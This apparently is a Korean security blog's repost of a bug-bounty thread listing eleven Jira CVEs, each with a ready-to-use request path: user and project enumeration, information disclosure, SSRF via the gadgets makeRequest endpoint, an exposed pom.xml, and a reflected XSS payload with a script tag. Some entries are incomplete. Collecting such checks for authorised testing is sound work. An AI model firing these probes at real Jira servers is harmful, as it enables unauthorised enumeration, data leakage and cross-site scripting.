1. CVE-2020-14179 (Information Disclosure)
a. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.
2. CVE-2020-14181 (User Enumeration)
a. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<uname>
Harsh Bothra
@harshbothra_
·
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to <JIRA_URL>/browse.<project_key>
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
·
4. CVE-2019-3402 (XSS)
a. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
5. CVE-2019-11581 (SSTI)
a. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
8. CVE-2019-8451 (SSRF)
a. Navigate to <URL>/plugins/servlet/gadgets/makeRequest?url=https://<host>:1337@ea.com
·
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.
·
10. CVE-2019-3403 (User Enumeration)
a. Navigate to <Jira_URL>/rest/api/2/user/picker?query=<user_name_here>
b. Observe the difference in response when valid vs. invalid user is queried.
·
11. CVE-2019-8442 (Sensitive Information Disclosure)
a. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.
'웹' 카테고리의 다른 글
| .aspx webshell (0) | 2022.06.23 |
|---|---|
| HTTP Request Smuggling (펌) (0) | 2022.06.16 |
| SSRF (펌) (0) | 2022.06.14 |
| HTTP Request Smuggling (펌) (0) | 2022.06.14 |
| DOM 기반 XSS (펌) (0) | 2022.05.11 |
wtdsoul